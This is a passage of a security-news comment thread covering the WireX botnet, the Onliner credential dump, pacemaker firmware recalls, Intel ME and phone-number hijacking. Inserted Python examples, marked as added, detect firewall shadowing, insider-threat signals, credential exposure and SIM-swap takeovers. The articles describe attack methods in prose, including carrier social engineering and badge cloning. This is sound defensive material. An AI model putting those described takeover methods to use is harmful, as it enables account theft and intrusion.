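    """Descriptions of rules that can never match because an earlier rule covers their range."""
    ordered = sorted(rules, key=lambda r: r["priority"])
    out = []
    for i, r in enumerate(ordered):
        for earlier in ordered[:i]:
            e = earlier["source_range"]
            if e.version == r["source_range"].version and r["source_range"].subnet_of(e):
                out.append(r["description"])
                break
    return out


if __name__ == "__main__":
    print("shadowed:", evaluate(SHADOWED, "198.51.100.77")[0])
    print("corrected:", evaluate(CORRECTED, "198.51.100.77")[0])
    print("dead rules in SHADOWED:", shadowed_rules(SHADOWED))
```

Run the shadowing check against your own rule export before applying changes; in the corrected set it reports only the default rule as unreachable, which is exactly what a deny-by-default policy should produce.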
  25. Tomi Engdahl says:

    Three Questions Every CISO Should Be Able to Answer
    http://www.securityweek.com/three-questions-every-ciso-should-be-able-answer

    Working with technical officers and cyber security specialists around the world, our conversations often center around a few key themes – the risk posed by IoT, the difficulty of detecting potentially malicious data transfers, and the overall lack of visibility into user and device activity.

    To understand the scale of the challenge, three questions in particular should be asked of your security team.

    1. Can you account for every device on the network?

    In my experience, even the most veteran security teams consistently underestimate the number of devices on their network, sometimes by up to 30 percent. And many companies lack the ability to detect anomalous activity on IoT devices and other non-conventional IT.

    2. Do you know where data is traveling, both internally and externally?

    In the hack of the Democratic National Committee in 2016, the culprits allegedly exfiltrated 80GB of data – roughly 500MB a day. And yet, even large, anomalous data transfers like these are liable to get lost in the noise of a busy network. More sophisticated attackers may steal or alter much smaller amounts of data at a time, slowly embedding themselves within networks, disguised as normal traffic.

    Understanding which movements of data are legitimate, and which are not, is complicated and requires context.

    3. Do you have meaningful oversight of how your users behave?

    External threats tend to get the most attention, but insider threats represent an equally serious security risk. Especially when it comes from trusted employees, unusual and threatening behavior is notoriously difficult to spot. After all, these threat actors have badges into the building and passwords for the network.

    An employee logging in at an unusual time, groups of files being aggregated, an abnormal volume of downloads – on their own, these actions might seem insignificant, and mostly they are. However, together they can be correlated and act as weak indicators that form a compelling picture of an emerging threat.

    Reply
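The third question above is answered by correlation rather than by any single alarm: an off-hours login, a pile of files being touched and an unusual download volume are each noise on their own and only become a signal together. As an added example (not the article author’s or any vendor’s code, and not part of the original comment), the Python below scores those three weak indicators per user and day over a constructed activity log and alerts only when they coincide. The event layout, the working-hours window, the file-count threshold and the per-user download baselines are assumptions.

```python
"""Correlate weak insider-threat indicators into a per-user, per-day alert.

Added example; not code from the article. Event line layout is assumed:
"YYYY-MM-DDTHH:MM,user,event,detail" where detail is a filename for
file_access, a byte count for download and "-" for login.
"""
from collections import defaultdict
from datetime import datetime

WORK_HOURS = range(7, 20)          # logins outside 07:00-19:59 are "unusual"
AGGREGATION_FILES = 20             # distinct files touched in one day
DOWNLOAD_BASELINE = {"alice": 50_000_000, "bob": 50_000_000}  # bytes/day, assumed
DOWNLOAD_MULTIPLIER = 5            # this many times the baseline is abnormal
ALERT_INDICATORS = 2               # alert when at least this many coincide


def _constructed_log():
    """Constructed sample: alice works normally, bob aggregates and pulls data at 2 a.m."""
    lines = [
        "2017-08-28T09:02,alice,login,-",
        "2017-08-28T09:10,alice,file_access,q3_forecast.xlsx",
        "2017-08-28T10:30,alice,download,12000000",
        "2017-08-28T02:15,bob,login,-",
        "2017-08-28T03:40,bob,download,410000000",
    ]
    lines += [f"2017-08-28T02:{20 + i:02d},bob,file_access,customer_{i}.csv"
              for i in range(25)]
    return "\n".join(lines)


SAMPLE_EVENTS = _constructed_log()


def parse(text):
    out = []
    for line in text.splitlines():
        ts, user, ev, detail = line.split(",", 3)
        out.append((datetime.fromisoformat(ts), user, ev, detail))
    return out


def indicators(text):
    """Return {(user, date): set of indicator names} for every user-day with at least one."""
    off_hours = set()
    files = defaultdict(set)
    downloads = defaultdict(int)
    for ts, user, ev, detail in parse(text):
        key = (user, ts.date().isoformat())
        if ev == "login" and ts.hour not in WORK_HOURS:
            off_hours.add(key)
        elif ev == "file_access":
            files[key].add(detail)
        elif ev == "download":
            downloads[key] += int(detail)

    found = defaultdict(set)
    for key in off_hours:
        found[key].add("off_hours_login")
    for key, names in files.items():
        if len(names) >= AGGREGATION_FILES:
            found[key].add("file_aggregation")
    for (user, day), total in downloads.items():
        # Unknown users get a zero baseline, so any download counts as abnormal.
        if total > DOWNLOAD_MULTIPLIER * DOWNLOAD_BASELINE.get(user, 0):
            found[(user, day)].add("abnormal_download_volume")
    return dict(found)


def alerts(text, threshold=ALERT_INDICATORS):
    """User-days where enough weak indicators coincide to be worth an analyst's time."""
    return {k: sorted(v) for k, v in indicators(text).items() if len(v) >= threshold}


if __name__ == "__main__":
    for (user, day), names in alerts(SAMPLE_EVENTS).items():
        print(f"{day} {user}: {', '.join(names)}")
```

The thresholds are deliberately crude; in practice the baseline is learned per user from their own history, which is also what makes the “500MB a day” DNC-style exfiltration in the second question visible when it would vanish against a whole network’s traffic.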
  26. Tomi Engdahl says:

    Hundreds of Russians Protest Tighter Internet Controls
    http://www.securityweek.com/hundreds-russians-protest-tighter-internet-controls

    About 1,000 Russians braved pouring rain in Moscow on Saturday to demonstrate against the government’s moves to tighten controls on internet use, with police arresting about a dozen protesters.

    Shouting slogans such as “Russia will be free” and “Russia without censorship”, the protesters were escorted by several police officers, in a march authorised by local authorities.

    Reply
  27. Tomi Engdahl says:

    Tech Firms Unite to Neutralize WireX Android Botnet
    http://www.securityweek.com/tech-firms-unite-neutralize-wirex-android-botnet

    Black clouds on the internet do sometimes have a silver lining. Global attacks such as those from Mirai last year and WannaCry/NotPetya this year have fomented informal collaborative global responses — one of which happened this month when multiple competitive vendors collaborated in the research and neutralization of a major new botnet called WireX.

    The collaboration was informal. Security experts often move around the industry, but usually retain good relationships and continue those relationships. This happened with WireX. It first appeared on August 2nd, but was small enough to be ignored. Two weeks later it ramped up into something altogether different.

    In a joint and coordinated announcement and series of blogs, Flashpoint, Akamai, Cloudflare, and RiskIQ have today explained how their researchers, together with researchers from other organizations, detected, collaborated, and ultimately neutralized the botnet.

    Reply
  28. Tomi Engdahl says:

    Irony: A site with a .fish domain was used to phish French bank customers
    https://thenextweb.com/security/2017/08/22/a-site-with-a-fish-domain-was-used-to-phish-french-bank-customers-and-my-irony-meter-just-exploded/#.tnw_NWBzxHj7

    It’s a hacking worthy of an Alanis Morissette song; a website with a generic .fish domain name was used to phish French banking customers, as spotted by the folks at Netcraft.

    Reply
  29. Tomi Engdahl says:

    Dustin Volz / Reuters:
    Uber says it’s removing app feature that allows tracking of riders for up to five minutes after a trip, starting this week for iPhone users — PALO ALTO, Calif. (Reuters) – Uber Technologies Inc [UBER.UL] is pulling a heavily criticized feature from its app that allowed it to track riders …

    Uber to end post-trip tracking of riders as part of privacy push
    http://www.reuters.com/article/us-uber-privacy-idUSKCN1B90EN

    Reply
  30. Tomi Engdahl says:

    Zack Whittaker / ZDNet:
    Researcher uncovers open server with 711M email addresses and other credentials, including passwords and email server info, used by a spambot to send malware

    711 million email addresses ensnared in “largest” spambot
    http://www.zdnet.com/article/onliner-spambot-largest-ever-malware-campaign-millions/

    The spambot has collected millions of email credentials and server login information in order to send spam through “legitimate” servers, defeating many spam filters.

    A huge spambot ensnaring 711 million email accounts has been uncovered.

    A Paris-based security researcher, who goes by the pseudonymous handle Benkow, discovered an open and accessible web server hosted in the Netherlands, which stores dozens of text files containing a huge batch of email addresses, passwords, and email servers used to send spam.

    Those credentials are crucial for the spammer’s large-scale malware operation to bypass spam filters by sending email through legitimate email servers.

    The spambot, dubbed “Onliner,” is used to deliver the Ursnif banking malware into inboxes all over the world. To date, it’s resulted in more than 100,000 unique infections across the world, Benkow told ZDNet.

    Troy Hunt, who runs breach notification site Have I Been Pwned, said it was a “mind-boggling amount of data.”

    Hunt, who analyzed the data and details his findings in a blog post, called it the “largest” batch of data to enter the breach notification site in its history.

    But while spamming is still an effective malware delivery method, email filters are getting smarter and many domains found to have sent spam have been blacklisted.

    “To send spam, the attacker needs a huge list of SMTP credentials,” said Benkow in his blog post. Those credentials authenticate the spammer in order to send what appears to be legitimate email.

    “The more SMTP servers he can find, the more he can distribute the campaign,” he said.

    Those credentials, he explained, have been scraped and collated from other data breaches, such as the LinkedIn hack and the Badoo hack, as well as other unknown sources. The list has about 80 million accounts, he said, with each line containing the email address and password, along with the SMTP server and the port used to send the email.

    These 80 million email servers are then used to send the remaining 630 million targets emails, designed to scope out the victim, or so-called “fingerprinting” emails.

    Hunt has made the data now searchable in Have I Been Pwned.

    Inside the Massive 711 Million Record Onliner Spambot Dump
    https://www.troyhunt.com/inside-the-massive-711-million-record-onliner-spambot-dump/

    Reply
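When a dump like this surfaces, the first job for a mail administrator is not to read it but to find out whether any of their own accounts or relays are in it, so those passwords can be reset and SMTP AUTH abuse stopped before the spammer uses them. As an added example (not Benkow’s or Troy Hunt’s tooling, and not part of the original comment), the Python below parses the kind of line the article describes, one account per line with email, password, SMTP server and port, de-duplicates it and reports exposure per domain. The colon-separated layout is an assumption about the dump; the sample lines and passwords are constructed placeholders.

```python
"""Triage a credential dump of the Onliner kind for your own domains.

Added example; not Benkow's or Troy Hunt's code. The line layout
"email:password:smtp_host:port" is an assumption; sample lines are constructed.
"""
from collections import defaultdict

SAMPLE_DUMP = """\
alice@example.com:Winter2016!:mail.example.com:587
bob@example.com:hunter2:mail.example.com:25
carol@example.org:letmein:smtp.hoster.example.net:465
alice@example.com:Winter2016!:mail.example.com:587
malformed line without separators
dave@example.com:pa:ss:word:mail.example.com:587
"""


def parse_line(line):
    """Split from the right so a password that itself contains ':' survives."""
    parts = line.rstrip("\n").rsplit(":", 2)
    if len(parts) != 3:
        return None
    left, host, port = parts
    if "@" not in left or ":" not in left or not port.isdigit():
        return None
    email, password = left.split(":", 1)
    return {"email": email.lower(), "password": password,
            "smtp_host": host.lower(), "port": int(port)}


def parse_dump(text):
    """Parse every well-formed line once; dumps like this repeat entries heavily."""
    seen = set()
    records = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["email"], rec["smtp_host"], rec["port"])
        if key in seen:
            continue
        seen.add(key)
        records.append(rec)
    return records


def exposure_for(records, our_domains):
    """Accounts and SMTP relays under our domains that appear in the dump."""
    report = defaultdict(lambda: {"accounts": set(), "smtp_hosts": set()})
    for rec in records:
        domain = rec["email"].split("@", 1)[1]
        if domain in our_domains:
            report[domain]["accounts"].add(rec["email"])
        # Assumes the relay's registrable domain is its last two labels.
        host_domain = ".".join(rec["smtp_host"].split(".")[-2:])
        if host_domain in our_domains:
            report[host_domain]["smtp_hosts"].add(rec["smtp_host"])
    return {d: {"accounts": sorted(v["accounts"]), "smtp_hosts": sorted(v["smtp_hosts"])}
            for d, v in report.items()}


if __name__ == "__main__":
    print(exposure_for(parse_dump(SAMPLE_DUMP), {"example.com"}))
```

The output is a reset list and a list of relays to check for unexpected authenticated sessions; the passwords themselves are parsed only so the line format round-trips and should not be written anywhere.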
  31. Tomi Engdahl says:

    Eric David / SiliconANGLE:
    Cyberprivacy platform startup Anonyome Labs raises $20.4M Series B, with Symantec CEO Greg Clark and Lifelock founder Todd Davis among investors

    Cyberprivacy startup Anonyome Labs raises $20.4M for secure messaging and payments
    https://siliconangle.com/blog/2017/08/28/cyber-privacy-startup-anonyome-labs-raises-20-4m-secure-messaging-payments/

    Anonyome Labs, a Utah-based startup that runs a cyberprivacy platform for consumers, announced today that it has closed a $20.4 million funding round.

    The Series B round included participation by existing investors Greg Clark, chief executive of Symantec Corp., and Crosspoint Ventures founder John Mumford, as well as new investors Hanna Ventures and Ariba co-founder Ken Eldred. The round also included a major investment from Todd Davis, founder and former chief executive of identity theft protection service LifeLock, who will also be joining Anonyome’s board of directors.

    Founded in 2014, Anonyome offers two mobile apps aimed at helping users keep their personal information secure and private. The first app, SudoApp, uses end-to-end encryption to allow users to securely make calls and send texts or emails to anyone, even if the recipient does not have the app installed. Anonyome’s second product is SudoPay, a digital payment service that lets users make purchases online without having to enter their personal information on each site.

    End-to-end encryption has been growing in popularity as more and more users become concerned about whether their personal information could be at risk.

    Reply
  32. Tomi Engdahl says:

    Internet providers could easily snoop on your smart home
    https://techcrunch.com/2017/08/28/study-tracks-what-smart-home-activity-can-be-seen-by-internet-providers/?ncid=rss&utm_source=tcfbpage&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&utm_content=FaceBook&sr_share=facebook

    We’ve mostly moved past the point where our Internet of Things devices leak private information to anyone watching via unsecured connections, but that doesn’t mean you can stop being afraid. Never, ever stop being afraid. To top up your paranoia reserves, a new study finds that internet providers can, if they so choose, monitor all kinds of things from your smart home’s traitorous metadata.

    Reply
  33. Tomi Engdahl says:

    Swedish slip-up leaks hosting company’s customer data
    Bork bork bork! Hackers infiltrate major hosting provider Loopia
    http://www.theregister.co.uk/2017/08/29/loopia_hacked_customer_data_revealed/

    A major Swedish web hosting company has been compromised and its entire customer database leaked.

    The company, Loopia, made the announcement here, saying the breach happened last Tuesday (August 22), and it notified customers on Friday, advising of a system-wide password reset and telling them to update their personal information.

    The statement says “the hackers have had access to parts of the customer database, including personal and contact information and encrypted (hashed) passwords to Loopia Kundzon”. Payment information such as credit cards didn’t leak, the company says, and customers’ hosted sites and e-mail services weren’t compromised.

    According to Upphandling24, Loopia has “hundreds of thousands” of customers.

    https://support.loopia.se/wiki/utskick/

    Reply
  34. Tomi Engdahl says:

    40% of manufacturing security professionals have no formal security strategy
    https://www.designnews.com/electronics-test/40-manufacturing-security-professionals-have-no-formal-security-strategy/115121990957373?ADTRK=UBM&elq_mid=788&elq_cid=876648

    Cisco cybersecurity survey also reported that 28% of manufacturing organizations suffered loss of revenue due to attacks in the past year.

    In its 90-page 2017 Midyear Cybersecurity Report, Cisco raised a warning flag because of the accelerating pace and rising level of sophistication in the global cyber threat landscape. Focusing on manufacturing, the report said that the combination of connected devices on outdated machines might be “ripe for exploitation.” But even more concerning is what might be viewed as a muted response by companies to potential security breaches.

    “A written security policy can provide a framework for improvements, yet according to the Cisco survey, 40 percent of the manufacturing security professionals said they do not have a formal security strategy, nor do they follow standardized information security policy practices such as ISO 27001 or NIST 800-53,” the report stated.

    Key Concerns for Manufacturing

    According to a Bloomberg study cited in the report, 80% of US factories are more than 20 years old and could be more vulnerable to attacks since systems are phased out gradually over time. Another potential issue is the use of a relatively large number of security vendors which could create a more complex and confusing picture as IT and OT personnel work together on security challenges, along with the number of personnel dedicated to security.

    Key Report Findings

    The report, in general, has a goal of keeping businesses apprised of cyber threats and vulnerabilities, and the steps companies can take to improve security and cyber-resiliency. Two dynamics are making the challenge for companies more difficult: the escalating impact of security breaches and the pace of technological change.

    Tactics being deployed by attackers are also a problem, so the report provides a comprehensive view of new developments in malware, attack methods, spam and unwanted applications such as spyware and business email compromise (BEC).

    The expectation is that defenders will struggle to maintain ground as the IoT continues to expand and new types of attacks emerge in the future. In response, the security community “needs to expand its thinking and dialogue about how to create an open ecosystem that will allow customers to implement security solutions that will work best for their organization and make the most of existing investments.”

  35. Tomi Engdahl says:

    Intel ME controller chip has secret kill switch
    Researchers find undocumented accommodation for government customers
    https://www.theregister.co.uk/2017/08/29/intel_management_engine_can_be_disabled/

    Security researchers at Moscow-based Positive Technologies have identified an undocumented configuration setting that disables Intel Management Engine 11, a CPU control mechanism that has been described as a security risk.

    Intel’s ME consists of a microcontroller that works with the Platform Controller Hub chip, in conjunction with integrated peripherals. It handles much of the data travelling between the processor and external devices, and thus has access to most of the data on the host computer.

    If compromised, it becomes a backdoor, giving an attacker control over the affected device.

    That possibility set off alarms in May, with the disclosure of a vulnerability in Intel’s Active Management Technology, a firmware application that runs on the Intel ME.

    The revelation prompted calls for a way to disable the poorly understood hardware. At the time, the Electronic Frontier Foundation called it a security hazard. The tech advocacy group demanded a way to disable “the undocumented master controller inside our Intel chips” and details about how the technology works.

    An unofficial workaround called ME Cleaner can partially hobble the technology, but cannot fully eliminate it.

    On Monday, Positive Technologies researchers Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy said they had found a way to turn off the Intel ME by setting the undocumented HAP bit to 1 in a configuration file.

    HAP stands for high assurance platform. It’s an IT security framework developed by the US National Security Agency.

    Disabling Intel ME 11 via undocumented mode
    http://blog.ptsecurity.com/2017/08/disabling-intel-me.html

  36. Tomi Engdahl says:

    F-Secure makes a cyber breakthrough testing on order

    If you saw a stranger at your workplace without a passport, would you tell anyone about it? Hardly. In Finnish firms, even unskilled persons are allowed to move relatively freely, and the absence of a passageway does not hurt either.

    Tuomo Makkonen (pictured) knows how confident in the local workplace are. He pulls F-Secure’s Red Team for work, whose members are able to break into office rather than office almost without exception.

    Red Team makes simulated data holes.

    In a typical case, the Red Team first monitors the office routines: where and with what time people are going to smoke, what kind of passageways hangs in the neck, what kind of security equipment is visible. You may infiltrate the coffee cup in your hand and walk in with the rest of the crowd. In a suitable situation cloned by someone’s staff pass and will be back in better time even at night.

    The goal is to conceal the so-called “drop box” or a remote-controlled device built from a card computer in the conference room or elsewhere near the network interface. It allows access to the internal network.

    F-Secure acquired a cyber-security company offering red teaming consulting company nSense two years ago. Customers are on their way from media houses to industrial companies. Especially the top management is always reluctant to report, as they help to improve security in a concrete way.

    Some of the tools are built by themselves. For example, the team has developed a tool for circumventing electronic access control. The signal of the cloned key is supplied with a strong antenna to the door’s electronic lock. Previously there was a need for a hammer, now the door can be traversed without traces.

    According to Makkonen, the access control device is only a small computer, so there are similar shortcomings. Organizations are also lazy and often give employees access to almost anything.

    Source: http://www.tivi.fi/Kaikki_uutiset/f-secure-tekee-tietomurtoja-tilauksesta-matonvaihtaja-voikin-olla-huijari-6672283

  37. Tomi Engdahl says:

    “Security always has three parts: a technical element, a process element, and a human element. We need to find weakness for only one. ”

    Source: http://www.tivi.fi/Kaikki_uutiset/f-secure-tekee-tietomurtoja-tilauksesta-matonvaihtaja-voikin-olla-huijari-6672283

  38. Tomi Engdahl says:

    Charlie Osborne / ZDNet:
    FDA recalls around 465,000 St. Jude Medical pacemaker models in US, many implanted in patients, for firmware patching of vulnerabilities; OTA fix not an option — Heart patients will have to visit their doctors to have their pacemakers patched for the “voluntary” recall — but there are risks.

    FDA issues recall of 465,000 St. Jude pacemakers to patch security holes
    http://www.zdnet.com/article/fda-forces-st-jude-pacemaker-recall-to-patch-security-vulnerabilities/

    Heart patients will have to visit their doctors to have their pacemakers patched for the “voluntary” recall — but there are risks.

    In what may be a first, patients with heart conditions that are using particular pacemaker brands will have to visit their doctors for firmware updates to keep their embedded devices safe from tampering.

    It seems such an odd concept at first, but with many kinds of pacemakers now “smarter,” with connections to mobile devices and diagnostic systems, the avenue has been carved for these medical devices to potentially be tampered with, should a threat actor choose.

    In particular, Abbott’s pacemakers, formerly of St. Jude Medical, have been “recalled” by the US Food and Drug Administration (FDA) on a voluntary basis.

    The devices must be given a firmware update to protect them against a set of critical vulnerabilities, first reported by MedSec, which could drain pacemaker battery life, allow attackers to change programmed settings, or even change the beats and rhythm of the device.

    On Tuesday, the FDA issued a security advisory, warning that the pacemakers must be recalled — and as they are embedded within the chests of their users, this requires a home visit or trip to the hospital to have the software patch applied.

    The Accent, Anthem, Accent MRI, Accent ST, Assurity, and Allure models are all affected.

    The FDA estimates that in total, 465,000 pacemakers in the US are impacted — although it is not known how many may be outside the United States.

    The update could not be delivered over the air and requires roughly three minutes in the presence of the patient to download and install while in backup mode.

    Patients are asked to contact their doctors to book themselves in for the update. However, doctors have been advised by Abbott to update only if “appropriate given the risk of update for the patient.”

    Unfortunately, installing the firmware update can result in a failure to update altogether, the loss of programmed settings, the loss of diagnostic data, as well as a very small risk — 0.003 percent — of complete functionality loss.

    “The FDA reminds patients, patient caregivers, and health care providers that any medical device connected to a communications network (e.g. Wi-Fi, public or home internet) may have cybersecurity vulnerabilities that could be exploited by unauthorized users,” the FDA says. “However, the increased use of wireless technology and software in medical devices can also often offer safer, more efficient, convenient, and timely health care delivery.”

    Firmware Update to Address Cybersecurity Vulnerabilities Identified in Abbott’s (formerly St. Jude Medical’s) Implantable Cardiac Pacemakers: FDA Safety Communication
    https://www.fda.gov/MedicalDevices/Safety/AlertsandNotices/ucm573669.htm

  39. Tomi Engdahl says:

    FDA Issues Recall of 465,000 St. Jude Pacemakers To Patch Security Holes
    https://science.slashdot.org/story/17/08/30/176217/fda-issues-recall-of-465000-st-jude-pacemakers-to-patch-security-holes?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Slashdot%2Fslashdot%2Fto+%28%28Title%29Slashdot+%28rdf%29%29

    It seems such an odd concept at first, but with many kinds of pacemakers now “smarter,” with connections to mobile devices and diagnostic systems, the avenue has been carved for these medical devices to potentially be tampered with, should a threat actor choose. In particular, Abbott’s pacemakers, formerly of St. Jude Medical, have been “recalled” by the US Food and Drug Administration (FDA) on a voluntary basis.

    FDA issues recall of 465,000 St. Jude pacemakers to patch security holes
    Heart patients will have to visit their doctors to have their pacemakers patched for the “voluntary” recall — but there are risks.
    http://www.zdnet.com/article/fda-forces-st-jude-pacemaker-recall-to-patch-security-vulnerabilities/

    In what may be a first, patients with heart conditions that are using particular pacemaker brands will have to visit their doctors for firmware updates to keep their embedded devices safe from tampering.

    The devices must be given a firmware update to protect them against a set of critical vulnerabilities, first reported by MedSec, which could drain pacemaker battery life, allow attackers to change programmed settings, or even change the beats and rhythm of the device.

  40. Tomi Engdahl says:

    Instagram API found leaking ‘high-profile’ email addresses and phone numbers
    http://www.zdnet.com/article/instagram-api-found-leaking-high-profile-email-addresses-and-phone-numbers/

    The Facebook-owned company says no passwords were leaked, but is warning users about suspicious calls and texts.

    Instagram has alerted all its verified users of unlawful access to phone and email contact information for its “high-profile” users thanks to a buggy API.

    The company said no passwords were accessed, it quickly fixed the bug, and is conducting an investigation into the incident.

    “At this point we believe this effort was targeted at high-profile users,” the photo-sharing site said in its alert. “We encourage you to be extra vigilant about the security of your account and exercise caution if you encounter any suspicious activity such as unrecognized incoming calls, texts, and emails.”

    “Your experience on Instagram is important to us, and we are sorry this happened.”

  41. Tomi Engdahl says:

    Enterprises (especially retail, hospitality) struggle with payment card data security standards
    http://www.zdnet.com/article/enterprises-especially-retail-hospitality-struggle-with-payment-card-data-security-standards/

    A Verizon report highlights that more organizations are compliant with PCI DSS, but companies still struggle with security controls.

    Enterprises are complying with the Payment Card Industry Data Security Standard (PCI DSS) more, but the number of organizations in compliance is still low enough to leave the door open for cyberattacks, according to Verizon.

    First, the good news. According to the Verizon 2017 Payment Security Report, 55.4 percent of organizations complied with PCI when validated in 2016, up from 48.4 percent in 2015. However, maintaining compliance is an issue, said Verizon.

    And there are still 44.6 percent of organizations such as retailers, restaurants and hotels not up to PCI standards. PCI DSS standards are there to allow businesses to take card payments and protect systems from cardholder data breaches. The requirements include items such as firewalls, data in transit controls, encryption and authentication.

    That lack of compliance is notable because, of all the payment card data breaches investigated by Verizon, no organizations were fully compliant at the time of the breach. Simply put, PCI DSS compliance is directly linked to data breaches.

    Key items from the Verizon payment security report:

    The IT services industry had the highest full PCI DSS compliance with 61.3 percent fully compliant during interim validation.
    59.1 percent of financial services organizations were fully compliant, but many struggled with security procedures, configurations, vulnerability management and overall risk.
    50 percent of retailers and 42.9 percent of hospitality organizations were PCI-DSS compliant. Retailers struggled with security testing, encrypted data transmissions and authentication and hospitality and travel groups struggled with security hardening, protecting data in transit and physical security.
    13 percent of companies failed interim assessments due to absent controls.

  42. Tomi Engdahl says:

    In colossal screw up, Essential shared customers’ driver’s licenses over email
    There’s a difference between scrappy and sloppy
    https://www.theverge.com/2017/8/30/16226028/essential-customer-email-drivers-license-phishing

    Last night, some customers who had preordered an Essential phone received an email asking for a copy of their driver’s license, ostensibly to verify their address in an attempt to prevent fraud.

    Dozens of customers replied with their personal information, but those emails didn’t just go to Essential; they went out to everybody who had received the original email. That means that an unknown number of Essential customers are now in possession of each other’s driver’s license, birth date, and address information.

    The incident is being reported as phishing by many outlets, because it looks and smells quite a lot like a phishing attempt: a weird request for personal information. After examining the email headers, it doesn’t look like this was an actual phishing attempt. It seems much more likely that this was a colossal screw up, the result of a misconfigured customer support email list.

    What appears to have happened is that Essential had a list of customers it needed to verify to prevent fraud, so it sent them an email requesting more information. But that email address was set up as a group email, which meant that replies sent to it went to everybody on that email list. It was a misconfigured customer support address on Zendesk, a customer service portal.

    We don’t know how or why the email address was configured this way. It could have been a simple misconfiguration or potentially even a disgruntled employee, Schnell says. Whatever the original cause — a phishing scam, a stupid mistake, or something else — the end result is that people sent emails with personal information that ended up going to total strangers.

    Essential CEO Andy Rubin later apologized, stating that the incident is “humiliating” and that he holds himself “personally responsible for the error.” Rubin also noted that Essential will offer one year of LifeLock to the affected patrons.

    Essential customers hit with deceptive phishing emails
    It’s still unclear what’s going on, but it’s probably for the best to leave that email alone.
    https://www.engadget.com/2017/08/30/essential-phone-deceptive-phishing-emails/

    Some customers who pre-ordered the Essential phone have reported getting suspicious emails asking for “additional verifying information.” Based on the copy someone posted on Reddit, the email is asking for a photo ID clearly showing your picture, signature and current billing address. The email was sent by an @essential address and looks pretty legit. But since the company says it’s investigating the situation and has “taken steps to mitigate” the issue, then it’s best to assume that it’s a phishing scheme, a scam of some sort or just anything you should not reply to with any identifying info.

  43. Tomi Engdahl says:

    Identity Thieves Hijack Cellphone Accounts to Go After Virtual Currency
    https://www.nytimes.com/2017/08/21/business/dealbook/phone-hack-bitcoin-virtual-currency.html

    Hackers have discovered that one of the most central elements of online security — the mobile phone number — is also one of the easiest to steal.

    In a growing number of online attacks, hackers have been calling up Verizon, T-Mobile U.S., Sprint and AT&T and asking them to transfer control of a victim’s phone number to a device under the control of the hackers.

    Once they get control of the phone number, they can reset the passwords on every account that uses the phone number as a security backup — as services like Google, Twitter and Facebook suggest.

    “My iPad restarted, my phone restarted and my computer restarted, and that’s when I got the cold sweat and was like, ‘O.K., this is really serious,’” said Chris Burniske, a virtual currency investor who lost control of his phone number late last year.

    A wide array of people have complained about being successfully targeted by this sort of attack

    But a particularly concentrated wave of attacks has hit those with the most obviously valuable online accounts: virtual currency fanatics like Mr. Burniske.

    Within minutes of getting control of Mr. Burniske’s phone, his attackers had changed the password on his virtual currency wallet and drained the contents — some $150,000 at today’s values.

    Most victims of these attacks in the virtual currency community have not wanted to acknowledge it publicly for fear of provoking their adversaries. But in interviews, dozens of prominent people in the industry acknowledged that they had been victimized in recent months.

    “Everybody I know in the cryptocurrency space has gotten their phone number stolen,” said Joby Weeks, a Bitcoin entrepreneur.

    Mr. Weeks lost his phone number and about a million dollars’ worth of virtual currency late last year, despite having asked his mobile phone provider for additional security after his wife and parents lost control of their phone numbers.

    The attackers appear to be focusing on anyone who talks on social media about owning virtual currencies or anyone who is known to invest in virtual currency companies, such as venture capitalists. And virtual currency transactions are designed to be irreversible.

    In a number of cases involving digital money aficionados, the attackers have held email files for ransom — threatening to release naked pictures in one case, and details of a victim’s sexual fetishes in another.

    The vulnerability of phone numbers is the unintended consequence of a broad push in the security industry to institute a practice, known as two-factor authentication, that is supposed to help make accounts more secure.

    Many email providers and financial firms require customers to tie their online accounts to phone numbers, to verify their identity. But this system also generally allows someone with the phone number to reset the passwords on these accounts without knowing the original passwords. A hacker just hits “forgot password?” and has a new code sent to the commandeered phone.

    Mr. Pokornicky was online at the time his phone number was taken, and he watched as his assailants seized all his major online accounts within a few minutes.

    “It felt like they were one step ahead of me the whole time,” he said.

    The speed with which the attackers move has convinced people who are investigating the hacks that the attacks are generally run by groups of hackers working together.

    Mr. Perklin and other people who have investigated recent hacks said the assailants generally succeeded by delivering sob stories about an emergency that required the phone number to be moved to a new device — and by trying multiple times until a gullible agent was found.

    “These guys will sit and call 600 times before they get through and get an agent on the line that’s an idiot,” Mr. Weeks said.

    Coinbase, one of the most widely used Bitcoin wallets, has encouraged customers to disconnect their mobile phones from their Coinbase accounts.

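The takeover sequence described in the post above, modelled from the defender's side as an added example (not from the article or the commenter): a check for accounts that can be reset with nothing but the phone number, and a detector that flags an SMS-verified password reset followed within minutes by recovery-setting changes or a withdrawal. The log format, account records, action names and 15-minute window are constructed assumptions.

```python
"""Defender-side model of the phone-number takeover pattern described above.

The attacker ports the victim's number, hits "forgot password", receives the
SMS code, resets the password, then within minutes changes recovery settings
and drains the account. Two checks follow:

1. flag_sms_only_recovery(): accounts whose only registered second factor or
   recovery channel is SMS, so control of the number alone resets the account.
2. detect_sms_reset_burst(): over an auth event log, accounts where an
   SMS-verified password reset is followed by high-risk actions inside a
   short window.

Log format, account records and thresholds are constructed for this example.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Iterable


@dataclass(frozen=True)
class AuthEvent:
    ts: datetime
    user: str
    action: str   # e.g. "password_reset", "recovery_email_changed", "withdrawal"
    channel: str  # factor that authorised it: "sms", "totp", "hw_key", "password"


# Actions an attacker performs right after a reset to lock the owner out
# and monetise the account (constructed list).
HIGH_RISK_ACTIONS = {
    "recovery_email_changed",
    "recovery_phone_changed",
    "2fa_method_changed",
    "withdrawal",
}


def parse_log(text: str) -> list[AuthEvent]:
    """Parse constructed 'ts user=.. action=.. channel=..' lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts_str, *fields = line.split()
        kv = dict(f.split("=", 1) for f in fields)
        events.append(AuthEvent(
            ts=datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ"),
            user=kv["user"], action=kv["action"], channel=kv["channel"],
        ))
    return events


def flag_sms_only_recovery(accounts: dict[str, set[str]]) -> list[str]:
    """Users for whom every registered factor is SMS: the phone number is a
    single point of failure, the situation the article's victims were in."""
    return sorted(u for u, factors in accounts.items()
                  if factors and factors <= {"sms"})


def detect_sms_reset_burst(events: Iterable[AuthEvent],
                           window: timedelta = timedelta(minutes=15)) -> dict[str, list[str]]:
    """Return {user: [high-risk actions]} where an SMS-authorised password
    reset was followed by high-risk actions within `window`. A hit is a
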